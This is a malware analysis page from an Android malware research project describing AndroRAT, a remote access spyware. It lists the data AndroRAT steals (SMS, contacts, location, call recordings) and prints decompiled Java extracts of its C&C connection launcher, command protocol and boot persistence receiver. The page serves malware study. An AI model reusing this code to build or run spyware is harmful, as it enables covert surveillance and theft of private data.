Family androRAT

Summary

android remote access tools

GroDDViewer graphs:

Details

AndroRAT is a malware discovered in 2016. This malware is a remote administration tool. It's not hide on a healthy application, and don't pass by TOR for the communication. we can supose this malware is curently on devolepement.

Stage 1: Malicious code execution

At the launch you have to put the IP and the port of the server command and control. After all this imformation are field press on the button Start Service, at this moment the application try to connect with the serveur C&C and wait an order.

Stage 2: Percistence

At the reebot of the device the application waits the BOOT_COMPLETED intent, when its reviced he launch the Client class.

Stage 3: Communication

The communication with the server C&C don't pass by TOR but the developer create his own communication system : sent all the data needed on a ArrayOfBits and cut its to extract the information needed by each order and do the same for sending the result.

Other resources

Triggering

To trigger the malware, launch the application and set the IP and the Port of the server C&C.

Caracteristics

Malware type :

Remote Administration Tool (RAT)
Spyware

Attacks :

Confidentiality
- Steal IMEI
- Steal contacts
- Steal bookmarks / navigation history
- Steal photos
- Steal and/or intercept SMS
- Steal call logs
- Steal phone number
- Steal device's location
- Record calls / microphone

Integrity
- Personal data are destroyed

Availability
- Data are unusable

Normal use
- Call unwanted number
- Download unwanted data
- Obey a bot server

Infection technique :

Malicious code type :

Use remote code

Hidding techniques :

Obfuscation with variable renaming

Triggering techniques :

Waits for a message from a remote server
Waits for a particular user input

Samples

androRAT

Java source code extracts:

LauncherActivity.java is the service started when the application is launched. you have to put the IP and the port of the serveur C&C Order.java define all the order that can be launched by androRAT.BootReceiver.java is the service launched on reboot of the device.

LauncherActivity.java

 this.btnStart.setOnClickListener(new View.OnClickListener()
    {
      public void onClick(View paramAnonymousView)
      {
        LauncherActivity.this.Client.putExtra("192.168.28.128", LauncherActivity.this.ipfield.getText().toString());
        LauncherActivity.this.Client.putExtra("2136", new Integer(LauncherActivity.this.portfield.getText().toString()));
        LauncherActivity.this.startService(LauncherActivity.this.Client);
        LauncherActivity.this.btnStart.setEnabled(false);
        LauncherActivity.this.btnStop.setEnabled(true);
      }
    });

Order.java

public class Protocol
{
  public static final short ACK_GIVE_CALL = (short)(P_REP + 13);
  public static final short ACK_SEND_SMS = (short)(P_REP + 14);
  public static final short ACK_TOAST;
  public static final int ALL_DONE = 3;
  public static final int ARG_STREAM_AUDIO_DOWN_CALL = 3;
  public static final int ARG_STREAM_AUDIO_MIC = 1;
  public static final int ARG_STREAM_AUDIO_UPDOWN_CALL = 4;
  public static final int ARG_STREAM_AUDIO_UP_CALL = 2;
  public static final short CONNECT = 2;
  public static final short DATA_BASIC_INFO;
  public static final short DATA_CALL_LOGS = (short)(P_REP + 15);
  public static final short DATA_CONTACTS;
  public static final short DATA_FILE;
  public static final short DATA_GPS;
  public static final short DATA_GPS_STREAM;
  public static final short DATA_LIST_DIR;
  public static final short DATA_MONITOR_CALL;
  public static final short DATA_MONITOR_SMS;
  public static final short DATA_PICTURE;
  public static final short DATA_SMS;
  public static final short DATA_SOUND_STREAM;
  public static final short DATA_VIDEO_STREAM;
  public static final short DEBUG = 0;
  public static final short DISCONNECT = 5;
  public static final short DO_TOAST;
  public static final short DO_VIBRATE;
  public static final short ENVOI_CMD = 3;
  public static final short ERROR = 1;
  public static final short GET_ADV_INFORMATIONS;
  public static final short GET_BASIC_INFO;
  public static final short GET_CALL_LOGS;
  public static final short GET_CONTACTS;
  public static final short GET_FILE;
  public static final short GET_GPS;
  public static final short GET_GPS_STREAM;
  public static final short GET_PICTURE;
  public static final short GET_PREFERENCE = 21;
  public static final short GET_SMS;
  public static final short GET_SOUND_STREAM;
  public static final short GET_VIDEO_STREAM;
  public static final short GIVE_CALL;
  public static final int HEADER_LENGTH_DATA = 15;
  public static final short INFOS = 4;
  public static final String KEY_SEND_SMS_BODY = "body";
  public static final String KEY_SEND_SMS_NUMBER = "number";
  public static final short LIST_DIR;
  public static final int MAX_PACKET_SIZE = 2048;
  public static final short MONITOR_CALL;
  public static final short MONITOR_SMS;
  public static final int NO_MORE = 1;
  public static final short OPEN_BROWSER;
  public static final int PACKET_DONE = 4;
  public static final int PACKET_LOST = 0;
  private static short P_INST = 100;
  private static short P_REP = 0;
  public static final short SEND_SMS;
  public static final short SET_PREFERENCE = 20;
  public static final int SIZE_ERROR = 2;
  public static final short STOP_GPS_STREAM;
  public static final short STOP_MONITOR_CALL;
  public static final short STOP_MONITOR_SMS;
  public static final short STOP_SOUND_STREAM;
  public static final short STOP_VIDEO_STREAM;
  
  static
  {
    GET_GPS = (short)(P_INST + 0);
    GET_GPS_STREAM = (short)(P_INST + 1);
    STOP_GPS_STREAM = (short)(P_INST + 2);
    GET_PICTURE = (short)(P_INST + 3);
    GET_SOUND_STREAM = (short)(P_INST + 4);
    STOP_SOUND_STREAM = (short)(P_INST + 5);
    GET_VIDEO_STREAM = (short)(P_INST + 6);
    STOP_VIDEO_STREAM = (short)(P_INST + 7);
    GET_BASIC_INFO = (short)(P_INST + 8);
    DO_TOAST = (short)(P_INST + 9);
    MONITOR_SMS = (short)(P_INST + 10);
    MONITOR_CALL = (short)(P_INST + 11);
    GET_CONTACTS = (short)(P_INST + 12);
    GET_SMS = (short)(P_INST + 13);
    LIST_DIR = (short)(P_INST + 14);
    GET_FILE = (short)(P_INST + 15);
    GIVE_CALL = (short)(P_INST + 16);
    SEND_SMS = (short)(P_INST + 17);
    GET_CALL_LOGS = (short)(P_INST + 18);
    STOP_MONITOR_SMS = (short)(P_INST + 19);
    STOP_MONITOR_CALL = (short)(P_INST + 20);
    GET_ADV_INFORMATIONS = (short)(P_INST + 21);
    OPEN_BROWSER = (short)(P_INST + 22);
    DO_VIBRATE = (short)(P_INST + 23);
    P_REP = 200;
    DATA_GPS = (short)(P_REP + 0);
    DATA_GPS_STREAM = (short)(P_REP + 1);
    DATA_PICTURE = (short)(P_REP + 2);
    DATA_SOUND_STREAM = (short)(P_REP + 3);
    DATA_VIDEO_STREAM = (short)(P_REP + 4);
    DATA_BASIC_INFO = (short)(P_REP + 5);
    ACK_TOAST = (short)(P_REP + 6);
    DATA_MONITOR_SMS = (short)(P_REP + 7);
    DATA_MONITOR_CALL = (short)(P_REP + 8);
    DATA_CONTACTS = (short)(P_REP + 9);
    DATA_SMS = (short)(P_REP + 10);
    DATA_LIST_DIR = (short)(P_REP + 11);
    DATA_FILE = (short)(P_REP + 12);
  }
}

BootReceiver.java

public class BootReceiver
  extends BroadcastReceiver
{
  public final String TAG = BootReceiver.class.getSimpleName();
  
  public void onReceive(Context paramContext, Intent paramIntent)
  {
    Log.i(this.TAG, "BOOT Complete received by Client !");
    if (paramIntent.getAction().equals("android.intent.action.BOOT_COMPLETED"))
    {
      paramIntent = new Intent(paramContext, Client.class);
      paramIntent.setAction(BootReceiver.class.getSimpleName());
      paramContext.startService(paramIntent);
    }
  }
}

Kharon project

Studying Android malware behaviors

AndroRAT

Summary

Details

Other resources

Triggering

Caracteristics

Samples

Java source code extracts:

LauncherActivity.java

Order.java

BootReceiver.java

Samples